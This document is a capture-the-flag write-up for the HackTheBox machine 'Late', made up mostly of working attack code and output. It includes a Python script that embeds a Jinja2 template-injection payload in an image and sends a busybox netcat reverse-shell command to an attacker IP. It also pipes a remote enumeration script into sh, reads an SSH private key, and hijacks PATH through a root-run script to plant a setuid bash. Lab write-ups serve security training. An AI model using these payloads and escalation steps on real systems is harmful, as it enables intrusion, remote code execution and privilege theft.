Late

Recon

nmap_scan.log
Open 10.129.227.134:22
Open 10.129.227.134:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -sC -Pn" on ip 10.129.227.134

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDSqIcUZeMzG+QAl/4uYzsU98davIPkVzDmzTPOmMONUsYleBjGVwAyLHsZHhgsJqM9lmxXkb8hT4ZTTa1azg4JsLwX1xKa8m+RnXwJ1DibEMNAO0vzaEBMsOOhFRwm5IcoDR0gOONsYYfz18pafMpaocitjw8mURa+YeY21EpF6cKSOCjkVWa6yB+GT8mOcTZOZStRXYosrOqz5w7hG+20RY8OYwBXJ2Ags6HJz3sqsyT80FMoHeGAUmu+LUJnyrW5foozKgxXhyOPszMvqosbrcrsG3ic3yhjSYKWCJO/Oxc76WUdUAlcGxbtD9U5jL+LY2ZCOPva1+/kznK8FhQN
|   256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBMen7Mjv8J63UQbISZ3Yju+a8dgXFwVLgKeTxgRc7W+k33OZaOqWBctKs8hIbaOehzMRsU7ugP6zIvYb25Kylw=
|   256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIGrWbMoMH87K09rDrkUvPUJ/ZpNAwHiUB66a/FKHWrj
80/tcp open  http    syn-ack nginx 1.14.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-favicon: Unknown favicon MD5: 1575FDF0E164C3DB0739CF05D9315BDF
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP (80)

The domain and a subdomain are disclosed on the index page.


http://images.late.htb/

from PIL import Image, ImageDraw, ImageFont
import io
import requests

def create_text_image(text, font_path=None, background_color=None, font_size=24, padding=20, fill_color=None):
    font_path = font_path or "arial.ttf"
    background_color = background_color or (255, 255, 255) # White
    fill_color = fill_color or (0, 0, 0)                   # Black

    font = ImageFont.truetype(font_path, font_size)
    text_width = int(font.getlength(text))

    image_width = text_width + padding 
    image_height = font_size + padding * 2
    text_x = (image_width - text_width) // 2

    image = Image.new("RGB", (image_width, image_height), background_color)
    draw = ImageDraw.Draw(image)
    draw.text((text_x, padding), text, font=font, fill=fill_color)

    return image

if __name__ == '__main__':
    text = 'xx{{ cycler.__init__.__globals__.os.popen(request.args.get("LETMEIN")).read() }}'
    font_path = '/usr/local/share/fonts/CaskaydiaCoveNerdFontMono-Bold.ttf'

    image = create_text_image(
        text,
        font_size=54,
        font_path=font_path
    )
    buffer = io.BytesIO()
    image.save('text_image.png', format="PNG")
    image.save(buffer, format="PNG")
    buffer.seek(0)

    url = "http://images.late.htb/scanner" 
    files = {"file": ("letmein.png", buffer, "image/png")}
    response = requests.post(url, files=files, params={'LETMEIN': "busybox nc 10.10.14.113 4444 -e /bin/bash"})

    print(response.text[3:-4])

Note: the text variable was changed between runs; the script above is the final version after those changes.

> text = 'let me in'
< let me in

> text = '{{ cycler.__init__.__globals__.os.popen("id").read() }}'
< uid=1000(svc_acc) gid=1000(svc_acc) groups=1000(svc_acc)

Reverse Shell

Run the script above to get a reverse shell.

└─$ pwncat-cs -lp 4444
[07:15:58] Welcome to pwncat 🐈!                                                         __main__.py:164
[07:23:23] received connection from 10.129.227.134:34298                                      bind.py:84
[07:23:26] 10.129.227.134:34298: registered new host w/ db                                manager.py:957
(local) pwncat$
(remote) svc_acc@late:/home/svc_acc/app$ id
uid=1000(svc_acc) gid=1000(svc_acc) groups=1000(svc_acc)

User.txt

(remote) svc_acc@late:/home/svc_acc/app$ cd
(remote) svc_acc@late:/home/svc_acc$ cat user.txt
5e1d660b6af7c811d3dee3ffe00a7272

Privilege Escalation

Upgrade the shell to SSH

(remote) svc_acc@late:/home/svc_acc$ cat .ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----
---
└─$ nano svc.id_rsa
└─$ chmod 600 *.id_rsa
└─$ ssh -i svc.id_rsa svc_acc@late.htb

Enumerate with linpeas

svc_acc@late:~$ curl 10.10.14.113/lp.sh|sh|tee /tmp/lp.log
╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/home/svc_acc/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root     722 Nov 16  2017 /etc/crontab
...
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 200)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/svc_acc
/run/lock
/run/screen
/run/sendmail/mta/smsocket
/run/user/1000
/run/user/1000/gnupg
/run/user/1000/systemd
...
/usr/local/sbin
/usr/local/sbin/ssh-alert.sh
/var/crash
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/tmp/lp.log
/usr/local/sbin/ssh-alert.sh
...
/var/mail/root

So clearly a cron job is running ssh-alert.sh; its mail recipient is root, and the job itself probably runs as root.

svc_acc@late:~$ cat /usr/local/sbin/ssh-alert.sh
#!/bin/bash

RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"

BODY="
A SSH login was detected.

        User:        $PAM_USER
        User IP Host: $PAM_RHOST
        Service:     $PAM_SERVICE
        TTY:         $PAM_TTY
        Date:        `date`
        Server:      `uname -a`
"

if [ ${PAM_TYPE} = "open_session" ]; then
        echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi

We have write permission on /usr/local/sbin, which is in the PATH, and the script calls date and uname without absolute paths.

svc_acc@late:~$ echo x > /usr/local/sbin/x
svc_acc@late:~$ ls -alh /usr/local/sbin/x
-rw-rw-r-- 1 svc_acc svc_acc 2 Dec 15 12:39 /usr/local/sbin/x
svc_acc@late:~$ nano /usr/local/sbin/date
#!/bin/bash
install -m4777 /bin/bash /tmp/rootbash
svc_acc@late:~$ chmod +x /usr/local/sbin/date
---
# Trigger cronjob
└─$ ssh -i svc.id_rsa svc_acc@late.htb
---
svc_acc@late:~$ /tmp/rootbash -p
rootbash-4.4# id
uid=1000(svc_acc) gid=1000(svc_acc) euid=0(root) groups=1000(svc_acc)

Root.txt

rootbash-4.4# cat /root/root.txt
90d9ffbcf31a52b98cf36a9d2d03868d
